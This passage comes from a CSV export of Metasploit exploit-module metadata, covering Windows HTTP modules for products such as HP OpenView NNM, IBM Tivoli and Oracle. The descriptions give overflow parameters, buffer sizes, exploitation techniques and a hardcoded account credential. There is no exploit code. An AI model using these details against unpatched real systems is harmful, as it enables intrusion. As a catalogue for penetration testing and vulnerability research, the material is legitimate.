While the saved return address can be smashed, a function call that occurs before the function returns calls ""exit"".","Metasploit Framework License (BSD)","f","2010-05-11 00:00:00",0,,"aggressive","t","BID-40068, CVE-2010-1552, OSVDB-64975, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-083/","jduck " 803,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_toolbar_01.rb","exploit","windows/http/hp_nnm_toolbar_01","exploit/windows/http/hp_nnm_toolbar_01","HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",0,,"aggressive","t","BID-33147, CVE-2008-0067, OSVDB-53222","MC " 804,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_toolbar_02.rb","exploit","windows/http/hp_nnm_toolbar_02","exploit/windows/http/hp_nnm_toolbar_02","HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",300,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works against a specific build (ie. 
NNM 7.53_01195)","Metasploit Framework License (BSD)","f","2009-01-21 00:00:00",,,"aggressive","t","BID-34294, CVE-2009-0920, OSVDB-53242, URL-http://www.coresecurity.com/content/openview-buffer-overflows","Oren Isacson, juan vazquez , sinn3r " 805,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb","exploit","windows/http/hp_nnm_webappmon_execvp","exploit/windows/http/hp_nnm_webappmon_execvp","HP OpenView Network Node Manager execvp_nc Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targetted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the ""execvp_nc"" function within ""ov.dll"" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. 
This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated.","Metasploit Framework License (BSD)","f","2010-07-20 00:00:00",,,"aggressive","t","BID-41829, CVE-2010-2703, OSVDB-66514, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088, URL-http://www.vupen.com/english/advisories/2010/1866, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-137/","Shahin Ramezany , jduck , sinn3r " 806,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb","exploit","windows/http/hp_nnm_webappmon_ovjavalocale","exploit/windows/http/hp_nnm_webappmon_ovjavalocale","HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",500,"This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is declared within this function. When the vulnerability is triggered, the stack trace looks like the following: #0 ... #1 sprintf_new(local_stack_buf, fmt, cooke); #2 OvWwwDebug("" HTTP_COOKIE=%s\n"", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0(""nnm"", ""webappmon""); No validation is done on the cookie argument. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the ""OvJavaLocale"" cookie being passed in a request ot ""webappmon.exe"". Further research shows that several different cookie values, as well as several different CGI applications, can be used. 
'","Metasploit Framework License (BSD)","f","2010-08-03 00:00:00",,,"aggressive","t","BID-42154, CVE-2010-2709, OSVDB-66932, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520, URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow","Nahuel Riva, jduck , sinn3r " 807,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_openview_insight_backdoor.rb","exploit","windows/http/hp_openview_insight_backdoor","exploit/windows/http/hp_openview_insight_backdoor","HP OpenView Performance Insight Server Backdoor Account Code Execution",600,"This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system allowing the execution of arbitary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0","Metasploit Framework License (BSD)","t","2011-01-31 00:00:00",0,,"aggressive","t","CVE-2011-0276, OSVDB-70754","MC " 808,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_power_manager_filename.rb","exploit","windows/http/hp_power_manager_filename","exploit/windows/http/hp_power_manager_filename","HP Power Manager 'formExportDataLogs' Buffer Overflow",300,"This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. 
By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result aribitrary remote code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"aggressive","t","BID-37867, CVE-2009-3999, OSVDB-61848","Alin Rad Pop, Rodrigo Escobar , sinn3r " 809,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/hp_power_manager_login.rb","exploit","windows/http/hp_power_manager_login","exploit/windows/http/hp_power_manager_login","Hewlett-Packard Power Manager Administration Buffer Overflow",200,"This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. Sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","CVE-2009-2685, OSVDB-59684","MC , sinn3r " 810,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/httpdx_handlepeer.rb","exploit","windows/http/httpdx_handlepeer","exploit/windows/http/httpdx_handlepeer","HTTPDX h_handlepeer() Function Buffer Overflow",500,"This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the ""h_handlepeer()"" function in http.cpp. 
By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-10-08 00:00:00",0,,"aggressive","t","CVE-2009-3711, OSVDB-58714, URL-http://www.pank4j.com/exploits/httpdxb0f.php, URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/","Pankaj Kohli , Trancer , jduck " 811,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/httpdx_tolog_format.rb","exploit","windows/http/httpdx_tolog_format","exploit/windows/http/httpdx_tolog_format","HTTPDX tolog() Function Format String Vulnerability",500,"This module exploits a format string vulnerability in HTTPDX HTTP server. By sending an specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.","Metasploit Framework License (BSD)","t","2009-11-17 00:00:00",0,,"aggressive","t","CVE-2009-4769, OSVDB-60182","jduck " 812,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ia_webmail.rb","exploit","windows/http/ia_webmail","exploit/windows/http/ia_webmail","IA WebMail 3.x Buffer Overflow",200,"This exploits a stack buffer overflow in the IA WebMail server. 
This exploit has not been tested against a live system at this time.","Metasploit Framework License (BSD)","f","2003-11-03 00:00:00",0,,"aggressive","t","BID-8965, CVE-2003-1192, OSVDB-2757, URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php","hdm " 813,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb","exploit","windows/http/ibm_tivoli_endpoint_bof","exploit/windows/http/ibm_tivoli_endpoint_bof","IBM Tivoli Endpoint Manager POST Query Buffer Overflow",400,"This module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.","Metasploit Framework License (BSD)","t","2011-05-31 00:00:00",,,"aggressive","t","BID-48049, CVE-2011-1220, OSVDB-72713, OSVDB-72751, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-169/","Jeremy Brown <0xjbrown@gmail.com>, bannedit " 814,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb","exploit","windows/http/ibm_tpmfosd_overflow","exploit/windows/http/ibm_tpmfosd_overflow","IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",400,"This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X.","Metasploit Framework License (BSD)","t","2007-05-02 00:00:00",0,,"aggressive","t","BID-23264, CVE-2007-1868, OSVDB-34678, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05","toto" 815,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tsm_cad_header.rb","exploit","windows/http/ibm_tsm_cad_header","exploit/windows/http/ibm_tsm_cad_header","IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",400,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-09-24 00:00:00",0,,"aggressive","t","BID-25743, CVE-2007-4880, OSVDB-38161","MC " 816,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/icecast_header.rb","exploit","windows/http/icecast_header","exploit/windows/http/icecast_header","Icecast (<= 2.0.1) Header Overwrite (win32)",500,"This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read not exploitable). !! This exploit uses ExitThread(), this will leave icecast thinking the thread is still in use, and the thread counter won't be decremented. This means for each time your payload exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. 
So you can multihit, but only till you fill the threadpool.","Metasploit Framework License (BSD)","f","2004-09-28 00:00:00",0,,"aggressive","t","BID-11271, CVE-2004-1561, OSVDB-10406, URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html","Luigi Auriemma , spoonm " 817,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/integard_password_bof.rb","exploit","windows/http/integard_password_bof","exploit/windows/http/integard_password_bof","Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Race river's Integard Home/Pro internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow attack. By sending an long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. The administration website service runs with SYSTEM privileges, and automatically restarts when it crashes.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"aggressive","t","OSVDB-67909, URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061","Lincoln, Nullthreat, corelanc0d3r , jduck , rick2600" 818,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/intersystems_cache.rb","exploit","windows/http/intersystems_cache","exploit/windows/http/intersystems_cache","InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",500,"This module exploits a stack buffer overflow in InterSystems Cache 2009.1. 
By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-09-29 00:00:00",0,,"aggressive","t","BID-37177, OSVDB-60549","MC " 819,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb","exploit","windows/http/ipswitch_wug_maincfgret","exploit/windows/http/ipswitch_wug_maincfgret","Ipswitch WhatsUp Gold 8.03 Buffer Overflow",500,"This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2004-08-25 00:00:00",0,,"aggressive","t","BID-11043, CVE-2004-0798, OSVDB-9177","MC " 820,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/kolibri_http.rb","exploit","windows/http/kolibri_http","exploit/windows/http/kolibri_http","Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow",400,"This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.","Metasploit Framework License (BSD)","f","2010-12-26 00:00:00",0,,"aggressive","t","BID-6289, CVE-2002-2268, EDB-15834, OSVDB-70808","TheLeader, mr_me , sinn3r " 821,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb","exploit","windows/http/landesk_thinkmanagement_upload_asp","exploit/windows/http/landesk_thinkmanagement_upload_asp","LANDesk Lenovo ThinkManagement Console Remote Command Execution",600,"This module can be used to execute a payload on LANDesk Lenovo ThinkManagement Suite 9.0.2 and 9.0.3. The payload is uploaded as an ASP script by sending a specially crafted SOAP request to ""/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"" , via a ""RunAMTCommand"" operation with the command '-PutUpdateFileCore' as the argument. 
After execution, the ASP script with the payload is deleted by sending another specially crafted SOAP request to ""WSVulnerabilityCore/VulCore.asmx"" via a ""SetTaskLogByFile"" operation.","Metasploit Framework License (BSD)","f","2012-02-15 00:00:00",0,,"aggressive","t","BID-52023, CVE-2012-1195, CVE-2012-1196, EDB-18622, EDB-18623, OSVDB-79276, OSVDB-79277","Andrea Micalizzi, juan vazquez " 822,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mailenable_auth_header.rb","exploit","windows/http/mailenable_auth_header","exploit/windows/http/mailenable_auth_header","MailEnable Authorization Header Buffer Overflow",500,"This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected.","Metasploit Framework License (BSD)","f","2005-04-24 00:00:00",0,,"aggressive","t","BID-13350, CVE-2005-1348, OSVDB-15737, OSVDB-15913, URL-http://www.nessus.org/plugins/index.php?view=single&id=18123","David Maciejak " 823,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/manageengine_apps_mngr.rb","exploit","windows/http/manageengine_apps_mngr","exploit/windows/http/manageengine_apps_mngr","ManageEngine Applications Manager Authenticated Code Execution",200,"This module logs into the Manage Engine Appplications Manager to upload a payload to the file system and a batch script that executes the payload.","Metasploit Framework License (BSD)","f","2011-04-08 00:00:00",0,,"aggressive","t","EDB-17152","Jacob Giannantonio " 824,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/maxdb_webdbm_database.rb","exploit","windows/http/maxdb_webdbm_database","exploit/windows/http/maxdb_webdbm_database","MaxDB WebDBM Database Parameter Overflow",400,"This module 
exploits a stack buffer overflow in the MaxDB WebDBM service. By sending a specially-crafted HTTP request that contains an overly long database name. A remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the wahttp process. This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.","Metasploit Framework License (BSD)","t","2006-08-29 00:00:00",0,,"aggressive","t","BID-19660, CVE-2006-4305, OSVDB-28300","MC " 825,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb","exploit","windows/http/maxdb_webdbm_get_overflow","exploit/windows/http/maxdb_webdbm_get_overflow","MaxDB WebDBM GET Buffer Overflow",400,"This module exploits a stack buffer overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents","Metasploit Framework License (BSD)","t","2005-04-26 00:00:00",0,,"aggressive","t","BID-13368, CVE-2005-0684, OSVDB-15816, URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities","hdm " 826,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mcafee_epolicy_source.rb","exploit","windows/http/mcafee_epolicy_source","exploit/windows/http/mcafee_epolicy_source","McAfee ePolicy Orchestrator / ProtectionPilot Overflow",200,"This is an exploit for the McAfee HTTP Server (NAISERV.exe). McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are known to be vulnerable. By sending a large 'Source' header, the stack can be overwritten. This module is based on the exploit by xbxice and muts. 
Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","t","2006-07-17 00:00:00",,,"aggressive","t","BID-20288, CVE-2006-5156, EDB-2467, OSVDB-29421, URL-http://www.remote-exploit.org/advisories/mcafee-epo.pdf","hdm , muts , patrick , xbxice " 827,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb","exploit","windows/http/mdaemon_worldclient_form2raw","exploit/windows/http/mdaemon_worldclient_form2raw","MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw.","Metasploit Framework License (BSD)","t","2003-12-29 00:00:00",0,,"aggressive","t","BID-9317, CVE-2003-1200, OSVDB-3255","patrick " 828,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/minishare_get_overflow.rb","exploit","windows/http/minishare_get_overflow","exploit/windows/http/minishare_get_overflow","Minishare 1.4.1 Buffer Overflow",200,"This is a simple buffer overflow for the minishare web server. 
This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a ""jmp esp"" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.","BSD License","f","2004-11-07 00:00:00",,,"aggressive","t","BID-11620, CVE-2004-2271, OSVDB-11530, URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html","acaro " 829,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/navicopa_get_overflow.rb","exploit","windows/http/navicopa_get_overflow","exploit/windows/http/navicopa_get_overflow","NaviCOPA 2.0.1 URL Handling Buffer Overflow",500,"This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters.","Metasploit Framework License (BSD)","t","2006-09-28 00:00:00",0,,"aggressive","t","BID-20250, CVE-2006-5112, OSVDB-29257","MC " 830,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/netdecision_http_bof.rb","exploit","windows/http/netdecision_http_bof","exploit/windows/http/netdecision_http_bof","NetDecision 4.5.1 HTTP Server Buffer Overflow",300,"This module exploits a vulnerability found in NetDecision's HTTP service (located in C:\Program Files\NetDecision\Bin\HttpSvr.exe). By supplying a long string of data to the URL, an overflow may occur if the data gets handled by HTTP Server's active window. 
In other words, in order to gain remote code execution, the victim is probably looking at HttpSvr's window.","Metasploit Framework License (BSD)","f","2012-02-24 00:00:00",0,,"aggressive","t","CVE-2012-1465, OSVDB-79651, URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt, URL-http://secunia.com/advisories/48168/","Prabhu S Angadi, sinn3r " 831,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/novell_imanager_upload.rb","exploit","windows/http/novell_imanager_upload","exploit/windows/http/novell_imanager_upload","Novell iManager getMultiPartParameters Arbitrary File Upload",600,"This module exploits a directory traversal vulnerability which allows remote attackers to upload and execute arbitrary code. PortalModuleInstallManager","Metasploit Framework License (BSD)","t","2010-10-01 00:00:00",0,,"aggressive","t","OSVDB-68320, URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-190/","jduck " 832,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/novell_messenger_acceptlang.rb","exploit","windows/http/novell_messenger_acceptlang","exploit/windows/http/novell_messenger_acceptlang","Novell Messenger Server 2.0 Accept-Language Overflow",200,"This module exploits a stack buffer overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. 
Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable.","Metasploit Framework License (BSD)","t","2006-04-13 00:00:00",,,"aggressive","t","BID-17503, CVE-2006-0992, OSVDB-24617","hdm " 833,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/nowsms.rb","exploit","windows/http/nowsms","exploit/windows/http/nowsms","Now SMS/MMS Gateway Buffer Overflow",400,"This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-19 00:00:00",0,,"aggressive","t","BID-27896, CVE-2008-0871, OSVDB-42953","MC " 834,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/oracle9i_xdb_pass.rb","exploit","windows/http/oracle9i_xdb_pass","exploit/windows/http/oracle9i_xdb_pass","Oracle 9i XDB HTTP PASS Overflow (win32)",500,"This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. 
David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","MC " 835,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/oracle_btm_writetofile.rb","exploit","windows/http/oracle_btm_writetofile","exploit/windows/http/oracle_btm_writetofile","Oracle Business Transaction Management FlashTunnelService Remote Code Execution",600,"This module exploits abuses the FlashTunnelService SOAP web service on Oracle Business Transaction Management 12.1.0.7 to upload arbitrary files, without authentication, using the WriteToFile method. The same method contains a directory traversal vulnerability, which allows to upload the files to arbitrary locations. In order to execute remote code two techniques are provided. If the Oracle app has been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code. Both techniques has been successfully tested on default installs of Oracle BTM 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. 
Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option.","Metasploit Framework License (BSD)","f","2012-08-07 00:00:00",0,,"aggressive","t","BID-54839, EDB-20318, OSVDB-85087","juan vazquez , rgod , sinn3r " 836,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/osb_uname_jlist.rb","exploit","windows/http/osb_uname_jlist","exploit/windows/http/osb_uname_jlist","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",600,"This module exploits an authentication bypass vulnerability in login.php. In conjunction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0.","Metasploit Framework License (BSD)","t","2010-07-13 00:00:00",0,,"aggressive","t","CVE-2010-0904, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-118","MC " 837,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/peercast_url.rb","exploit","windows/http/peercast_url","exploit/windows/http/peercast_url","PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)",200,"This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.","Metasploit Framework License (BSD)","f","2006-03-08 00:00:00",,,"aggressive","t","BID-17040, CVE-2006-1148, OSVDB-23777, URL-http://www.infigo.hr/in_focus/INFIGO-2006-03-01","hdm " 838,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/php_apache_request_headers_bof.rb","exploit","windows/http/php_apache_request_headers_bof","exploit/windows/http/php_apache_request_headers_bof","PHP apache_request_headers Function Buffer Overflow",300,"This module exploits a stack based buffer overflow in the CGI version of PHP 5.4.x before 5.4.3. 
The vulnerability is due to the insecure handling of the HTTP headers. This module has been tested against the thread safe version of PHP 5.4.2, from ""windows.php.net"", running with Apache 2.2.22 from ""apachelounge.com"".","Metasploit Framework License (BSD)","t","2012-05-08 00:00:00",0,,"aggressive","t","BID-53455, CVE-2012-2329, OSVDB-82215, URL-http://www.php.net/ChangeLog-5.php#5.4.3, URL-http://www.php.net/archive/2012.php#id2012-05-08-1, URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000","Vincent Danen, juan vazquez " 839,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/privatewire_gateway.rb","exploit","windows/http/privatewire_gateway","exploit/windows/http/privatewire_gateway","Private Wire Gateway Buffer Overflow",200,"This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility.","Metasploit Framework License (BSD)","f","2006-06-26 00:00:00",4,,"aggressive","t","BID-18647, CVE-2006-3252, OSVDB-26861","Michael Thumann " 840,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/psoproxy91_overflow.rb","exploit","windows/http/psoproxy91_overflow","exploit/windows/http/psoproxy91_overflow","PSO Proxy v0.91 Stack Buffer Overflow",200,"This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.","Metasploit Framework License (BSD)","f","2004-02-20 00:00:00",,,"aggressive","t","BID-9706, CVE-2004-0313, EDB-156, OSVDB-4028","patrick " 841,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/rabidhamster_r4_log.rb","exploit","windows/http/rabidhamster_r4_log","exploit/windows/http/rabidhamster_r4_log","RabidHamster R4 Log Entry sprintf() Buffer Overflow",300,"This module exploits a vulnerability found in RabidHamster R4's web server. 
By supplying a malformed HTTP request, it is possible to trigger a stack-based buffer overflow when generating a log, which may result in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-02-09 00:00:00",0,,"aggressive","t","OSVDB-79007, URL-http://aluigi.altervista.org/adv/r4_1-adv.txt, URL-http://secunia.com/advisories/47901/","Luigi Auriemma, sinn3r " 842,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sambar6_search_results.rb","exploit","windows/http/sambar6_search_results","exploit/windows/http/sambar6_search_results","Sambar 6 Search Results Buffer Overflow",300,"This module exploits a buffer overflow found in the /search/results.stm application that comes with Sambar 6. This code is a direct port of Andrew Griffiths's SMUDGE exploit, the only changes made were to the nops and payload. This exploit causes the service to die, whether you provided the correct target or not.","Metasploit Framework License (BSD)","f","2003-06-21 00:00:00",,,"aggressive","t","BID-9607, CVE-2004-2086, OSVDB-5786","Andrew Griffiths , hdm , patrick " 843,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb","exploit","windows/http/sap_configservlet_exec_noauth","exploit/windows/http/sap_configservlet_exec_noauth","SAP ConfigServlet Remote Code Execution",500,"This module allows remote code execution via operating system commands through the SAP ConfigServlet without any authentication. 
